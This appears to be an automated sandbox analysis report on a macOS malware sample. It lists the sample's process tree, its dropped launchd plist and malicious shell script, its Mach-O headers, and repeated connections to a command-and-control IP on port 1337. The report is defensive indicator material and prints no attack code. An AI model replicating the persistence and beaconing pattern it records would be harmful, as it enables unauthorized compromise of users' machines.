    • sh (PID: 571 PPID: 552 Overlayed Process Image: g70Ei8kMg7 MD5: 8aa60b22a5d30418a002b340989384dc)
    • ps (PID: 571 PPID: 552 Overlayed Process Image: sh MD5: 792e18b1417ac1f184680d2423206e4f)
  • xpcproxy (PID: 570 PPID: 1 MD5: d1bb9a4899f0af921e8188218b20d744)
  • script.sh (PID: 570 PPID: 1 Overlayed Process Image: xpcproxy MD5: e26e3fe247d795ea2d21f3eb4e070871)
    • bash (PID: 572 PPID: 570 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
    • python (PID: 572 PPID: 570 Overlayed Process Image: bash MD5: 2464fd41f7cf319d0e5c61a7643af77e)
    • Python (PID: 572 PPID: 570 Overlayed Process Image: python MD5: ba780ab677147d9db60c564ef3f51dd0)
    • bash (PID: 573 PPID: 570 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
    • sleep (PID: 573 PPID: 570 Overlayed Process Image: bash MD5: cd4336ba78cb5b78f50d0f935036c332)
    • bash (PID: 574 PPID: 570 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
    • python (PID: 574 PPID: 570 Overlayed Process Image: bash MD5: 2464fd41f7cf319d0e5c61a7643af77e)
    • Python (PID: 574 PPID: 570 Overlayed Process Image: python MD5: ba780ab677147d9db60c564ef3f51dd0)
  • cleanup

Created / dropped Files

/dev/null
Process:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File Type:ASCII text
Size (bytes):271
Entropy (8bit):4.93296801346042
Encrypted:false
MD5:ED68C6643CE7E329B4E2F7CD935E4F76
SHA1:E195C22FB2CAECCD00BD02B8B8706F024474E972
SHA-256:120E8BF09DC1E0D527051BDF7D819B87C14C819078F2532BE5478D4477FCC8E9
SHA-512:60F2222355448AE64596C0504DD53F2725DC5F69B9FC9003320A9A2647DABDAB912608C6C78B10E34994FCF7021B1775DF95C40B70F7B1248CC08C4AD2C6A666
Malicious:false
Reputation:low
/private/tmp/com.startup.plist
Process:/Users/henry/Desktop/g70Ei8kMg7
File Type:XML document text
Size (bytes):356
Entropy (8bit):5.217648607385835
Encrypted:false
MD5:7DE4694985A438E0B81AF81F5A297B6A
SHA1:C031AA6175F24BAEE319D1C8001979AECE1DC2C3
SHA-256:80263952FF0B747297A041CEB546222C1216D70F09DF8EAFDC84645633E639CF
SHA-512:D5F8549DB0DA0730B277ED1B548389C209311E87309E60E3AC2F8C7D917FFBA670957DA4A8CDB203DD07F1D62074A62ABFBF1F605E2F1F8FD4A5336EAFDD41E9
Malicious:false
Reputation:low
/private/tmp/script.sh
Process:/Users/henry/Desktop/g70Ei8kMg7
File Type:Bourne-Again shell script text executable
Size (bytes):274
Entropy (8bit):5.27902207594642
Encrypted:false
MD5:E26E3FE247D795EA2D21F3EB4E070871
SHA1:15A4F216BBA34A9D289E4FB182BF378953EF900F
SHA-256:E0E0F0EB94293938AB2F0A5A4A6B8D669357638EE5ECFEA7AA9ED537BD93BF0B
SHA-512:DA3939C5E1A9196306D3E859682EB9A514A1C745D86DBBC3696C68DFF8FAA0BD26E09A1D77F42F7E294A95A77F6D111F3F802ABDD7681E2CC1B8B7168CFB6EF4
Malicious:true
Reputation:low

Contacted Domains/Contacted IPs

Contacted Domains

No contacted domains info

Contacted IPs

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Public

IPCountryFlagASNASN NameMalicious
185.243.115.230unknown
60781LEASEWEB-NLNetherlandsNLtrue

Static File Info

General

File type:Mach-O 64-bit executable
Entropy (8bit):6.3859803821024785
TrID:
  • Mac OS X Mach-O 64bit Intel executable (20004/1) 70.18%
  • Java Script (6500/0) 22.80%
  • Java Script embedded in Visual Basic Script (2000/0) 7.02%
File name:g70Ei8kMg7
File size:35423119
MD5:7130faced98c800e6d8b1c42eca7d3dc
SHA1:3bb644b8d74850f5b0da14c18a75659c45affcf9
SHA256:ced05b1f429ade707691b04f59d7929961661963311b768d438317f4d3d82953
SHA512:8ef5158a4f3d5c70ac27671a48cf873feaffbc7357196fa8b528c3a230d59cc460d4b6a351575b4cd1e947f985bc1633b4285b8e8c3fbed8b989254ed952abc4
File Content Preview:....................8...............H...__PAGEZERO..............................................................__TEXT....................N...............N.....................__text..........__TEXT.........................................................

Static Mach Info

General Informations for header0

Endian:<
Size:64-bit
Architecture:x86_64
Filetype:execute
Nbr. of load commands:16
segment_command_64
NameValue
segname__PAGEZERO
fileoff0
maxprot0
vmsize4294967296
nsects0
flags0
filesize0
vmaddr0
initprot0
segment_command_64
NameValue
segname__TEXT
fileoff0
maxprot7
vmsize21938176
nsects9
flags0
filesize21938176
vmaddr4294967296
initprot5
Datassectname__text
segname__TEXT
reloff0
addr4294970880
align8
nreloc0
flags2147484672
offset3584
reserved20
reserved10
reserved30
size12377594
sectname__stubs
segname__TEXT
reloff0
addr4307348474
align1
nreloc0
flags2147484680
offset12381178
reserved26
reserved10
reserved30
size3564
sectname__stub_helper
segname__TEXT
reloff0
addr4307352040
align2
nreloc0
flags2147484672
offset12384744
reserved20
reserved10
reserved30
size3826
sectname__cstring
segname__TEXT
reloff0
addr4307355872
align4
nreloc0
flags2
offset12388576
reserved20
reserved10
reserved30
size943759
sectname__const
segname__TEXT
reloff0
addr4308299776
align12
nreloc0
flags0
offset13332480
reserved20
reserved10
reserved30
size6667548
sectname__ustring
segname__TEXT
reloff0
addr4314967328
align4
nreloc0
flags0
offset20000032
reserved20
reserved10
reserved30
size2804
sectname__dof_node
segname__TEXT
reloff0
addr4314970132
align0
nreloc0
flags15
offset20002836
reserved20
reserved10
reserved30
size2206
sectname__unwind_info
segname__TEXT
reloff0
addr4314972340
align2
nreloc0
flags0
offset20005044
reserved20
reserved10
reserved30
size84172
sectname__eh_frame
segname__TEXT
reloff0
addr4315056512
align3
nreloc0
flags0
offset20089216
reserved20
reserved10
reserved30
size1848352
segment_command_64
NameValue
segname__DATA
fileoff21938176
maxprot7
vmsize741376
nsects12
flags0
filesize663552
vmaddr4316905472
initprot3
Datassectname__program_vars
segname__DATA
reloff0
addr4316905472
align3
nreloc0
flags0
offset21938176
reserved20
reserved10
reserved30
size40
sectname__nl_symbol_ptr
segname__DATA
reloff0
addr4316905512
align3
nreloc0
flags6
offset21938216
reserved20
reserved1594
reserved30
size16
sectname__got
segname__DATA
reloff0
addr4316905528
align3
nreloc0
flags6
offset21938232
reserved20
reserved1596
reserved30
size15368
sectname__la_symbol_ptr
segname__DATA
reloff0
addr4316920896
align3
nreloc0
flags7
offset21953600
reserved20
reserved12517
reserved30
size4752
sectname__mod_init_func
segname__DATA
reloff0
addr4316925648
align3
nreloc0
flags9
offset21958352
reserved20
reserved10
reserved30
size296
sectname__mod_term_func
segname__DATA
reloff0
addr4316925944
align3
nreloc0
flags10
offset21958648
reserved20
reserved10
reserved30
size16
sectname__const
segname__DATA
reloff0
addr4316925968
align4
nreloc0
flags0
offset21958672
reserved20
reserved10
reserved30
size450456
sectname__data
segname__DATA
reloff0
addr4317376432
align4
nreloc0
flags0
offset22409136
reserved20
reserved10
reserved30
size190600
sectname__thread_vars
segname__DATA
reloff0
addr4317567032
align0
nreloc0
flags19
offset22599736
reserved20
reserved10
reserved30
size24
sectname__thread_bss
segname__DATA
reloff0
addr4317567056
align2
nreloc0
flags18
offset0
reserved20
reserved10
reserved30
size4
sectname__common
segname__DATA
reloff0
addr4317567072
align4
nreloc0
flags1
offset0
reserved20
reserved10
reserved30
size5272
sectname__bss
segname__DATA
reloff0
addr4317572352
align4
nreloc0
flags1
offset0
reserved20
reserved10
reserved30
size71031
segment_command_64
NameValue
segname__LINKEDIT
fileoff22601728
maxprot7
vmsize12726272
nsects0
flags0
filesize12723860
vmaddr4317646848
initprot1
dyld_info_command
NameValue
lazy_bind_size10688
lazy_bind_off22724664
weak_bind_size118840
rebase_size0
export_off22735352
export_size1353488
bind_off22601728
rebase_off0
bind_size4096
weak_bind_off22605824
symtab_command
NameValue
strsize7264256
symoff24149816
stroff28061332
nsyms243692
dysymtab_command
NameValue
extreloff0
nlocrel0
indirectsymoff28048888
modtaboff0
nextrel0
iundefsym243260
nmodtab0
ilocalsym0
nundefsym432
nextrefsyms0
locreloff0
ntoc0
nlocalsym210586
tocoff0
extrefsymoff0
nindirectsyms3111
iextdefsym210586
nextdefsym32674
dylinker_command
NameValue
name12
Data/usr/lib/dyld
uuid_command
NameValue
uuidfc34349212093d9fb6cc7d2d55cf375d
version_min_command
NameValue
version657152
reserved658176
dylib_command
NameValue
compatibility_version0.150.0
timestampThu Jan 01 01:00:02 1970
name24
current_version3584.232.4
Data/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation
dylib_command
NameValue
compatibility_version0.1.0
timestampThu Jan 01 01:00:02 1970
name24
current_version2561.202.4
Data/usr/lib/libSystem.B.dylib
dylib_command
NameValue
compatibility_version0.1.0
timestampThu Jan 01 01:00:02 1970
name24
current_version256.120.0
Data/usr/lib/libc++.1.dylib
linkedit_data_command
NameValue
dataoff24088840
datassize60976
linkedit_data_command
NameValue
dataoff24149816
datassize0

Network Behavior

Network Port Distribution

TCP Packets

TimestampSource PortDest PortSource IPDest IP
Jul 3, 2018 07:37:04.267441988 MESZ492751337192.168.0.50185.243.115.230
Jul 3, 2018 07:37:05.269747972 MESZ492751337192.168.0.50185.243.115.230
Jul 3, 2018 07:37:06.273696899 MESZ492751337192.168.0.50185.243.115.230
Jul 3, 2018 07:37:07.275238037 MESZ492751337192.168.0.50185.243.115.230
Jul 3, 2018 07:37:08.279784918 MESZ492751337192.168.0.50185.243.115.230
Jul 3, 2018 07:37:09.282298088 MESZ492751337192.168.0.50185.243.115.230
Jul 3, 2018 07:37:11.286078930 MESZ492751337192.168.0.50185.243.115.230
Jul 3, 2018 07:37:15.291418076 MESZ492751337192.168.0.50185.243.115.230
Jul 3, 2018 07:37:23.302539110 MESZ492751337192.168.0.50185.243.115.230
Jul 3, 2018 07:37:39.319745064 MESZ492751337192.168.0.50185.243.115.230
Jul 3, 2018 07:38:11.355443001 MESZ492751337192.168.0.50185.243.115.230
Jul 3, 2018 07:38:24.523853064 MESZ492761337192.168.0.50185.243.115.230
Jul 3, 2018 07:38:25.527010918 MESZ492761337192.168.0.50185.243.115.230
Jul 3, 2018 07:38:26.528081894 MESZ492761337192.168.0.50185.243.115.230
Jul 3, 2018 07:38:27.528316021 MESZ492761337192.168.0.50185.243.115.230
Jul 3, 2018 07:38:28.530971050 MESZ492761337192.168.0.50185.243.115.230
Jul 3, 2018 07:38:29.531991005 MESZ492761337192.168.0.50185.243.115.230
Jul 3, 2018 07:38:31.533932924 MESZ492761337192.168.0.50185.243.115.230
Jul 3, 2018 07:38:35.540324926 MESZ492761337192.168.0.50185.243.115.230
Jul 3, 2018 07:38:43.550141096 MESZ492761337192.168.0.50185.243.115.230
Jul 3, 2018 07:38:59.567827940 MESZ492761337192.168.0.50185.243.115.230

System Behavior

Analysis Process: mono-sgen32 PID: 552 Parent PID: 505

General

Start time:07:37:01
Start date:03/07/2018
Path:/Library/Frameworks/Mono.framework/Versions/4.4.2/bin/mono-sgen32
File size:3722408 bytes
MD5 hash:8910349f44a940d8d79318367855b236

Chronological Activities

Analysis Process: g70Ei8kMg7 PID: 552 Parent PID: 505

General

Start time:07:37:01
Start date:03/07/2018
Path:/Users/henry/Desktop/g70Ei8kMg7
File size:35423119 bytes
MD5 hash:7130faced98c800e6d8b1c42eca7d3dc

Chronological Activities

Analysis Process: g70Ei8kMg7 PID: 553 Parent PID: 552

General

Start time:07:37:01
Start date:03/07/2018
Path:/Users/henry/Desktop/g70Ei8kMg7
File size:35423119 bytes
MD5 hash:7130faced98c800e6d8b1c42eca7d3dc

Chronological Activities

Analysis Process: sudo PID: 553 Parent PID: 552

General

Start time:07:37:01
Start date:03/07/2018
Path:/usr/bin/sudo
File size:365760 bytes
MD5 hash:60ac5909d06d86e22aace3a863b13690

Chronological Activities

Analysis Process: sudo PID: 554 Parent PID: 553

General

Start time:07:37:01
Start date:03/07/2018
Path:/usr/bin/sudo
File size:365760 bytes
MD5 hash:60ac5909d06d86e22aace3a863b13690

Chronological Activities

Analysis Process: chown PID: 554 Parent PID: 553

General

Start time:07:37:01
Start date:03/07/2018
Path:/usr/sbin/chown
File size:23312 bytes
MD5 hash:cc600d309dc91e491f52c51e0b1821ec

Chronological Activities

Analysis Process: g70Ei8kMg7 PID: 555 Parent PID: 552

General

Start time:07:37:01
Start date:03/07/2018
Path:/Users/henry/Desktop/g70Ei8kMg7
File size:35423119 bytes
MD5 hash:7130faced98c800e6d8b1c42eca7d3dc

Chronological Activities

Analysis Process: sh PID: 555 Parent PID: 552

General

Start time:07:37:01
Start date:03/07/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

Chronological Activities

Analysis Process: ps PID: 555 Parent PID: 552

General

Start time:07:37:01
Start date:03/07/2018
Path:/bin/ps
File size:51280 bytes
MD5 hash:792e18b1417ac1f184680d2423206e4f

Chronological Activities

Analysis Process: g70Ei8kMg7 PID: 556 Parent PID: 552

General

Start time:07:37:01
Start date:03/07/2018
Path:/Users/henry/Desktop/g70Ei8kMg7
File size:35423119 bytes
MD5 hash:7130faced98c800e6d8b1c42eca7d3dc

Chronological Activities

Analysis Process: sudo PID: 556 Parent PID: 552

General

Start time:07:37:01
Start date:03/07/2018
Path:/usr/bin/sudo
File size:365760 bytes
MD5 hash:60ac5909d06d86e22aace3a863b13690

Chronological Activities

Analysis Process: sudo PID: 557 Parent PID: 556

General

Start time:07:37:01
Start date:03/07/2018
Path:/usr/bin/sudo
File size:365760 bytes
MD5 hash:60ac5909d06d86e22aace3a863b13690

Chronological Activities

Analysis Process: chmod PID: 557 Parent PID: 556

General

Start time:07:37:01
Start date:03/07/2018
Path:/bin/chmod
File size:30016 bytes
MD5 hash:30e3e10a3e7ad9adfd37662b2e9b4f8a

Chronological Activities

Analysis Process: g70Ei8kMg7 PID: 558 Parent PID: 552

General

Start time:07:37:01
Start date:03/07/2018
Path:/Users/henry/Desktop/g70Ei8kMg7
File size:35423119 bytes
MD5 hash:7130faced98c800e6d8b1c42eca7d3dc

Chronological Activities

Analysis Process: sh PID: 558 Parent PID: 552

General

Start time:07:37:02
Start date:03/07/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

Chronological Activities

Analysis Process: ps PID: 558 Parent PID: 552

General

Start time:07:37:02
Start date:03/07/2018
Path:/bin/ps
File size:51280 bytes
MD5 hash:792e18b1417ac1f184680d2423206e4f

Chronological Activities

Analysis Process: g70Ei8kMg7 PID: 559 Parent PID: 552

General

Start time:07:37:02
Start date:03/07/2018
Path:/Users/henry/Desktop/g70Ei8kMg7
File size:35423119 bytes
MD5 hash:7130faced98c800e6d8b1c42eca7d3dc

Chronological Activities

Analysis Process: sudo PID: 559 Parent PID: 552

General

Start time:07:37:02
Start date:03/07/2018
Path:/usr/bin/sudo
File size:365760 bytes
MD5 hash:60ac5909d06d86e22aace3a863b13690

Chronological Activities

Analysis Process: sudo PID: 560 Parent PID: 559

General

Start time:07:37:02
Start date:03/07/2018
Path:/usr/bin/sudo
File size:365760 bytes
MD5 hash:60ac5909d06d86e22aace3a863b13690

Chronological Activities

Analysis Process: mv PID: 560 Parent PID: 559

General

Start time:07:37:02
Start date:03/07/2018
Path:/bin/mv
File size:24240 bytes
MD5 hash:7f791dd4bef08d618fece911d6e3398a

Chronological Activities

Analysis Process: g70Ei8kMg7 PID: 561 Parent PID: 552

General

Start time:07:37:02
Start date:03/07/2018
Path:/Users/henry/Desktop/g70Ei8kMg7
File size:35423119 bytes
MD5 hash:7130faced98c800e6d8b1c42eca7d3dc

Chronological Activities

Analysis Process: sh PID: 561 Parent PID: 552

General

Start time:07:37:02
Start date:03/07/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

Chronological Activities

Analysis Process: ps PID: 561 Parent PID: 552

General

Start time:07:37:02
Start date:03/07/2018
Path:/bin/ps
File size:51280 bytes
MD5 hash:792e18b1417ac1f184680d2423206e4f

Chronological Activities

Analysis Process: g70Ei8kMg7 PID: 562 Parent PID: 552

General

Start time:07:37:02
Start date:03/07/2018
Path:/Users/henry/Desktop/g70Ei8kMg7
File size:35423119 bytes
MD5 hash:7130faced98c800e6d8b1c42eca7d3dc

Chronological Activities

Analysis Process: sudo PID: 562 Parent PID: 552

General

Start time:07:37:02
Start date:03/07/2018
Path:/usr/bin/sudo
File size:365760 bytes
MD5 hash:60ac5909d06d86e22aace3a863b13690

Chronological Activities

Analysis Process: sudo PID: 563 Parent PID: 562

General

Start time:07:37:02
Start date:03/07/2018
Path:/usr/bin/sudo
File size:365760 bytes
MD5 hash:60ac5909d06d86e22aace3a863b13690

Chronological Activities

Analysis Process: mv PID: 563 Parent PID: 562

General

Start time:07:37:02
Start date:03/07/2018
Path:/bin/mv
File size:24240 bytes
MD5 hash:7f791dd4bef08d618fece911d6e3398a

Chronological Activities

Analysis Process: g70Ei8kMg7 PID: 564 Parent PID: 552

General

Start time:07:37:02
Start date:03/07/2018
Path:/Users/henry/Desktop/g70Ei8kMg7
File size:35423119 bytes
MD5 hash:7130faced98c800e6d8b1c42eca7d3dc

Chronological Activities

Analysis Process: sh PID: 564 Parent PID: 552

General

Start time:07:37:02
Start date:03/07/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

Chronological Activities

Analysis Process: ps PID: 564 Parent PID: 552

General

Start time:07:37:02
Start date:03/07/2018
Path:/bin/ps
File size:51280 bytes
MD5 hash:792e18b1417ac1f184680d2423206e4f

Chronological Activities

Analysis Process: g70Ei8kMg7 PID: 565 Parent PID: 552

General

Start time:07:37:02
Start date:03/07/2018
Path:/Users/henry/Desktop/g70Ei8kMg7
File size:35423119 bytes
MD5 hash:7130faced98c800e6d8b1c42eca7d3dc

Chronological Activities

Analysis Process: sudo PID: 565 Parent PID: 552

General

Start time:07:37:02
Start date:03/07/2018
Path:/usr/bin/sudo
File size:365760 bytes
MD5 hash:60ac5909d06d86e22aace3a863b13690

Chronological Activities

Analysis Process: sudo PID: 566 Parent PID: 565

General

Start time:07:37:02
Start date:03/07/2018
Path:/usr/bin/sudo
File size:365760 bytes
MD5 hash:60ac5909d06d86e22aace3a863b13690

Chronological Activities

Analysis Process: chown PID: 566 Parent PID: 565

General

Start time:07:37:02
Start date:03/07/2018
Path:/usr/sbin/chown
File size:23312 bytes
MD5 hash:cc600d309dc91e491f52c51e0b1821ec

Chronological Activities

Analysis Process: g70Ei8kMg7 PID: 567 Parent PID: 552

General

Start time:07:37:02
Start date:03/07/2018
Path:/Users/henry/Desktop/g70Ei8kMg7
File size:35423119 bytes
MD5 hash:7130faced98c800e6d8b1c42eca7d3dc

Chronological Activities

Analysis Process: sh PID: 567 Parent PID: 552

General

Start time:07:37:02
Start date:03/07/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

Chronological Activities

Analysis Process: ps PID: 567 Parent PID: 552

General

Start time:07:37:02
Start date:03/07/2018
Path:/bin/ps
File size:51280 bytes
MD5 hash:792e18b1417ac1f184680d2423206e4f

Chronological Activities

Analysis Process: g70Ei8kMg7 PID: 568 Parent PID: 552

General

Start time:07:37:02
Start date:03/07/2018
Path:/Users/henry/Desktop/g70Ei8kMg7
File size:35423119 bytes
MD5 hash:7130faced98c800e6d8b1c42eca7d3dc

Chronological Activities

Analysis Process: sudo PID: 568 Parent PID: 552

General

Start time:07:37:02
Start date:03/07/2018
Path:/usr/bin/sudo
File size:365760 bytes
MD5 hash:60ac5909d06d86e22aace3a863b13690

Chronological Activities

Analysis Process: sudo PID: 569 Parent PID: 568

General

Start time:07:37:02
Start date:03/07/2018
Path:/usr/bin/sudo
File size:365760 bytes
MD5 hash:60ac5909d06d86e22aace3a863b13690

Chronological Activities

Analysis Process: launchctl PID: 569 Parent PID: 568

General

Start time:07:37:02
Start date:03/07/2018
Path:/bin/launchctl
File size:124656 bytes
MD5 hash:17fad4b994d600d0a5b6bc02b55c2c80

Chronological Activities

Analysis Process: g70Ei8kMg7 PID: 571 Parent PID: 552

General

Start time:07:37:02
Start date:03/07/2018
Path:/Users/henry/Desktop/g70Ei8kMg7
File size:35423119 bytes
MD5 hash:7130faced98c800e6d8b1c42eca7d3dc

Chronological Activities

Analysis Process: sh PID: 571 Parent PID: 552

General

Start time:07:37:02
Start date:03/07/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

Chronological Activities

Analysis Process: ps PID: 571 Parent PID: 552

General

Start time:07:37:02
Start date:03/07/2018
Path:/bin/ps
File size:51280 bytes
MD5 hash:792e18b1417ac1f184680d2423206e4f

Chronological Activities

Analysis Process: xpcproxy PID: 570 Parent PID: 1

General

Start time:07:37:02
Start date:03/07/2018
Path:/usr/libexec/xpcproxy
File size:43488 bytes
MD5 hash:d1bb9a4899f0af921e8188218b20d744

Chronological Activities

Analysis Process: script.sh PID: 570 Parent PID: 1

General

Start time:07:37:02
Start date:03/07/2018
Path:/var/root/script.sh
File size:274 bytes
MD5 hash:e26e3fe247d795ea2d21f3eb4e070871

Chronological Activities

Analysis Process: bash PID: 572 Parent PID: 570

General

Start time:07:37:02
Start date:03/07/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

Chronological Activities

Analysis Process: python PID: 572 Parent PID: 570

General

Start time:07:37:02
Start date:03/07/2018
Path:/usr/bin/python
File size:66880 bytes
MD5 hash:2464fd41f7cf319d0e5c61a7643af77e

Chronological Activities

Analysis Process: Python PID: 572 Parent PID: 570

General

Start time:07:37:03
Start date:03/07/2018
Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File size:51744 bytes
MD5 hash:ba780ab677147d9db60c564ef3f51dd0

Chronological Activities

Analysis Process: bash PID: 573 Parent PID: 570

General

Start time:07:38:18
Start date:03/07/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

Chronological Activities

Analysis Process: sleep PID: 573 Parent PID: 570

General

Start time:07:38:18
Start date:03/07/2018
Path:/bin/sleep
File size:18080 bytes
MD5 hash:cd4336ba78cb5b78f50d0f935036c332

Chronological Activities

Analysis Process: bash PID: 574 Parent PID: 570

General

Start time:07:38:23
Start date:03/07/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

Chronological Activities

Analysis Process: python PID: 574 Parent PID: 570

General

Start time:07:38:23
Start date:03/07/2018
Path:/usr/bin/python
File size:66880 bytes
MD5 hash:2464fd41f7cf319d0e5c61a7643af77e

Chronological Activities

Analysis Process: Python PID: 574 Parent PID: 570

General

Start time:07:38:23
Start date:03/07/2018
Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File size:51744 bytes
MD5 hash:ba780ab677147d9db60c564ef3f51dd0

Chronological Activities